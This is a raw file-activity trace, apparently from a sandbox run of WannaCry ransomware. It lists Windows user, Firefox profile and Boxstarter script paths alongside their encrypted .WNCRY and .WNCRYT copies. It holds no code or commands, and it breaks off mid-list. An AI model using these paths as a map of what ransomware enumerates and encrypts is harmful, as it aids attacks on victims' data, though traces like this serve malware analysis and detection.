C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\security_state\~SD348E.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\sessionstore-backups\~SD348F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\settings\~SD34A0.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\~SD34A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\default\~SD34A2.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\~SD34A3.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\~SD34A4.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\~SD34A5.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\~SD3532.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\~SD35A1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\~SD35D1.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\~SD3610.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\~SD3650.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\~SD369F.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\storage\temporary\~SD371D.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\~SD378B.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\failed\~SD37BB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\weave\toFetch\~SD37EB.tmp
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\*
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yivbg7nf.default\~SD380B.tmp
C:\Users\user\AppData\Roaming\Skype\*
C:\Users\user\AppData\Roaming\Skype
C:\Users\user\AppData\Roaming\Skype\~SD385A.tmp
C:\Users\user\AppData\Roaming\Skype\RootTools\*
C:\Users\user\AppData\Roaming\Skype\RootTools
C:\Users\user\AppData\Roaming\Skype\RootTools\~SD388A.tmp
C:\Users\user\AppData\Roaming\Sun\*
C:\Users\user\AppData\Roaming\Sun
C:\Users\user\AppData\Roaming\Sun\~SD38AA.tmp
C:\Users\user\AppData\Roaming\Sun\Java\*
C:\Users\user\AppData\Roaming\Sun\Java
C:\Users\user\AppData\Roaming\Sun\Java\~SD38BB.tmp
C:\Users\user\AppData\Roaming\Sun\Java\Deployment\*
C:\Users\user\AppData\Roaming\Sun\Java\Deployment
C:\Users\user\AppData\Roaming\Sun\Java\Deployment\~SD38DB.tmp
C:\Users\user\Application Data\*
C:\Users\user\Contacts\*
C:\Users\user\Contacts
C:\Users\user\Contacts\~SD38EC.tmp
C:\Users\user\Cookies\*
C:\Users\user\Desktop\~SD38ED.tmp
C:\Users\user\Documents\~SD38FE.tmp
C:\Users\user\Documents\WindowsPowerShell\~SD391E.tmp
C:\Users\user\Downloads\*
C:\Users\user\Downloads
C:\Users\user\Downloads\~SD393E.tmp
C:\Users\user\Favorites\*
C:\Users\user\Favorites
C:\Users\user\Favorites\~SD396E.tmp
C:\Users\user\Favorites\Links\*
C:\Users\user\Favorites\Links
C:\Users\user\Favorites\Links\~SD397F.tmp
C:\Users\user\Favorites\Links for United States\*
C:\Users\user\Favorites\Links for United States
C:\Users\user\Favorites\Links for United States\~SD39BE.tmp
C:\Users\user\Links\*
C:\Users\user\Links
C:\Users\user\Links\~SD39DE.tmp
C:\Users\user\Local Settings\*
C:\Users\user\Music\*
C:\Users\user\Music
C:\Users\user\Music\~SD3A0E.tmp
C:\Users\user\My Documents\*
C:\Users\user\NetHood\*
C:\Users\user\OneDrive\*
C:\Users\user\OneDrive
C:\Users\user\OneDrive\~SD3A2E.tmp
C:\Users\user\Pictures\*
C:\Users\user\Pictures
C:\Users\user\Pictures\~SD3A4F.tmp
C:\Users\user\PrintHood\*
C:\Users\user\Recent\*
C:\Users\user\Saved Games\*
C:\Users\user\Saved Games
C:\Users\user\Saved Games\~SD3A6F.tmp
C:\Users\user\Searches\*
C:\Users\user\Searches
C:\Users\user\Searches\~SD3AAE.tmp
C:\Users\user\SendTo\*
C:\Users\user\Start Menu\*
C:\Users\user\Templates\*
C:\Users\user\Videos\*
C:\Users\user\Videos
C:\Users\user\Videos\~SD3AFE.tmp
C:\vlmcsd\*
C:\vlmcsd
C:\vlmcsd\~SD3B2D.tmp
C:\BOOTSECT.BAK.WNCRY
C:\BOOTSECT.BAK
C:\BOOTSECT.BAK.WNCRYT
C:\ba69bdf0a250e352360c33\header.bmp.WNCRY
C:\ba69bdf0a250e352360c33\header.bmp
C:\ba69bdf0a250e352360c33\header.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRY
C:\ba69bdf0a250e352360c33\SplashScreen.bmp
C:\ba69bdf0a250e352360c33\SplashScreen.bmp.WNCRYT
C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRY
C:\ba69bdf0a250e352360c33\watermark.bmp
C:\ba69bdf0a250e352360c33\watermark.bmp.WNCRYT
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRY
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1
C:\Users\All Users\Boxstarter\BoxstarterShell.ps1.WNCRYT
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRY
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1
C:\Users\All Users\Boxstarter\chocolateyUninstall.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Cleanup-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-BoxstarterTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Get-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Install-BoxstarterExtension.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Boxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Invoke-Reboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Set-SecureAutoLogon.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Start-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Stop-UpdateServices.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Bootstrapper\Test-PendingReboot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Boxstarter.zip.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\BoxstarterConnectionConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterClientRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-BoxstarterCredSSP.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Enable-RemotePsRemoting.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Get-PackageRoot.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\invoke-chocolatey.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\New-PackageFromScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Send-File.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Confirm-Choice.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Create-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Enter-DotNet4.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Format-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-CurrentUser.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-HttpResource.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Get-IsRemote.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Init-Settings.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-FromTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Invoke-RetriableScript.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Log-BoxStarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Out-BoxstarterLog.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterError.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Remove-BoxstarterTask.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Start-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Stop-TimedSection.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Test-Admin.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterLogo.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1
C:\Users\All Users\Boxstarter\Boxstarter.Common\Write-BoxstarterMessage.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
C:\Users\All Users\Boxstarter\Boxstarter.HyperV\Enable-BoxstarterVM.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-BingSearch.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-GameBarTips.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Disable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Enable-UAC.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-LibraryNames.ps1.WNCRYT
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1.WNCRY
C:\Users\All Users\Boxstarter\Boxstarter.WinConfig\Get-UAC.ps1
